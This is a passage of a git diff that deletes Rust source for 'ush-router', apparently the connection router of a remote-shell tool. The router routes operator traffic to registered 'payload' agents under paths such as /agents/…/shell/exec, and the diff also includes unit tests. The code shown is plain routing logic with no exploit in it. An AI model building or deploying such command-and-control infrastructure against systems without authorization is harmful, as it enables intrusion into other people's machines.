router. -/// -/// # Example -/// -/// ```rust,no_run -/// use ush_router::registry::{NodeRegistry, NodeEntry}; -/// // (not a public API — internal to the router binary) -/// ``` -pub struct NodeRegistry { - /// Map from node_id to its registry entry. - nodes: HashMap, -} - -impl NodeRegistry { - /// Create an empty registry. - #[must_use] - pub fn new() -> Self { - Self { - nodes: HashMap::new(), - } - } - - /// Register a new node. - /// - /// If a node with the same `node_id` is already registered, the old - /// entry is replaced. This handles the reconnect case (same payload - /// reconnects after a network drop). - pub fn register(&mut self, entry: NodeEntry) { - self.nodes.insert(entry.node_id.clone(), entry); - } - - /// Remove a node from the registry. - /// - /// Called when a node's TCP connection closes (either end). - pub fn unregister(&mut self, node_id: &str) { - self.nodes.remove(node_id); - } - - /// Find the node that should receive a packet addressed to `dst_path`. - /// - /// Uses longest-prefix matching: returns the node whose registered path - /// is the longest prefix of `dst_path`. - /// - /// Returns `None` if no registered node matches. - /// - /// # Example - /// - /// ```text - /// Registered: /agents/abc123 → node A - /// Registered: /operator/sess1 → node B - /// - /// find_route("/agents/abc123/shell/exec") → Some(node A's tx) - /// find_route("/operator/sess1/anything") → Some(node B's tx) - /// find_route("/unknown") → None - /// ``` - #[must_use] - pub fn find_route(&self, dst_path: &str) -> Option<&Sender>> { - let dst_components = split_path(dst_path); - - let best = self - .nodes - .values() - .flat_map(|entry| { - entry.registered_paths.iter().filter_map(|reg_path| { - let reg_components = split_path(reg_path); - if is_prefix(®_components, &dst_components) { - Some((reg_components.len(), &entry.tx)) - } else { - None - } - }) - }) - .max_by_key(|(match_len, _)| *match_len); - - best.map(|(_, tx)| tx) - } - - /// Return a snapshot of all registered node IDs and their path prefixes. - /// - /// Used by the `/router/nodes` built-in endpoint. - #[must_use] - pub fn node_list(&self) -> Vec { - self.nodes - .values() - .map(|e| NodeInfo { - node_id: e.node_id.clone(), - node_type: e.node_type.clone(), - registered_paths: e.registered_paths.clone(), - connected_at: e.connected_at, - }) - .collect() - } -} - -impl Default for NodeRegistry { - fn default() -> Self { - Self::new() - } -} - -/// A read-only snapshot of a node's identity (no channel reference). -/// -/// Safe to serialize and send across thread boundaries. -/// Used by the `/router/nodes` endpoint (not yet implemented, hence the allow). -#[allow(dead_code)] -#[derive(Debug, Clone)] -pub struct NodeInfo { - /// Unique node ID. - pub node_id: String, - /// Payload or operator. - pub node_type: NodeType, - /// Registered path prefixes. - pub registered_paths: Vec, - /// Unix timestamp of connection. - pub connected_at: u64, -} - -// --------------------------------------------------------------------------- -// Path utilities (duplicated from the library to avoid coupling) -// --------------------------------------------------------------------------- - -/// Split a `/`-delimited path into components, discarding empty segments. -fn split_path(path: &str) -> Vec<&str> { - path.split('/').filter(|s| !s.is_empty()).collect() -} - -/// Returns `true` if `prefix` is a prefix of (or equal to) `path`. -fn is_prefix<'a>(prefix: &[&'a str], path: &[&'a str]) -> bool { - if prefix.len() > path.len() { - return false; - } - prefix.iter().zip(path.iter()).all(|(a, b)| a == b) -} - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use super::*; - use crossbeam_channel::unbounded; - use unshell::protocol::NodeType; - - fn make_entry(id: &str, paths: &[&str]) -> NodeEntry { - let (tx, _rx) = unbounded(); - NodeEntry { - node_id: id.to_owned(), - node_type: NodeType::Payload, - registered_paths: paths.iter().map(|s| (*s).to_owned()).collect(), - connected_at: 0, - tx, - } - } - - #[test] - fn route_single_node() { - let mut reg = NodeRegistry::new(); - reg.register(make_entry("abc123", &["/agents/abc123"])); - - assert!(reg.find_route("/agents/abc123/shell/exec").is_some()); - } - - #[test] - fn route_no_match() { - let mut reg = NodeRegistry::new(); - reg.register(make_entry("abc123", &["/agents/abc123"])); - - assert!(reg.find_route("/agents/xyz456/shell").is_none()); - } - - #[test] - fn unregister_removes_node() { - let mut reg = NodeRegistry::new(); - reg.register(make_entry("abc123", &["/agents/abc123"])); - reg.unregister("abc123"); - - assert!(reg.find_route("/agents/abc123/shell").is_none()); - } - - #[test] - fn route_longest_prefix_wins() { - let mut reg = NodeRegistry::new(); - // Node A owns /agents - reg.register(make_entry("nodeA", &["/agents"])); - // Node B owns /agents/abc123 specifically - reg.register(make_entry("nodeB", &["/agents/abc123"])); - - // A request to /agents/abc123/shell should go to nodeB (longer match) - let tx = reg - .find_route("/agents/abc123/shell") - .expect("should find a route"); - - // We can't directly compare Senders by node, but we can verify the - // nodeB's sender is the one we get by checking node_list. - // (In practice, the router uses the tx to forward bytes.) - let _ = tx; // Verify it's Some - } -} diff --git a/ush-router/src/router.rs b/ush-router/src/router.rs deleted file mode 100644 index b54030b..0000000 --- a/ush-router/src/router.rs +++ /dev/null @@ -1,49 +0,0 @@ -//! # Router Core -//! -//! The main accept loop. Binds a TCP listener and spawns a node thread for -//! each incoming connection. - -use std::net::TcpListener; -use std::sync::{Arc, Mutex}; - -use crate::registry::NodeRegistry; -use crate::node::spawn_node; - -/// Start the router, binding to `bind_addr` and accepting connections forever. -/// -/// This function blocks until an unrecoverable error occurs. -/// -/// # Errors -/// -/// Returns an error if the bind fails (e.g., port already in use). -/// -/// # Example -/// -/// ```rust,no_run -/// ush_router::router::run("0.0.0.0:9000").expect("router failed"); -/// ``` -pub fn run(bind_addr: &str) -> Result<(), Box> { - let listener = TcpListener::bind(bind_addr)?; - eprintln!("[router] listening on {bind_addr}"); - - let registry = Arc::new(Mutex::new(NodeRegistry::new())); - - for stream in listener.incoming() { - match stream { - Ok(stream) => { - let addr = stream - .peer_addr() - .map(|a| a.to_string()) - .unwrap_or_else(|_| "unknown".into()); - eprintln!("[router] new connection from {addr}"); - spawn_node(stream, Arc::clone(®istry)); - } - Err(e) => { - eprintln!("[router] accept error: {e}"); - // Non-fatal; keep accepting. - } - } - } - - Ok(()) -}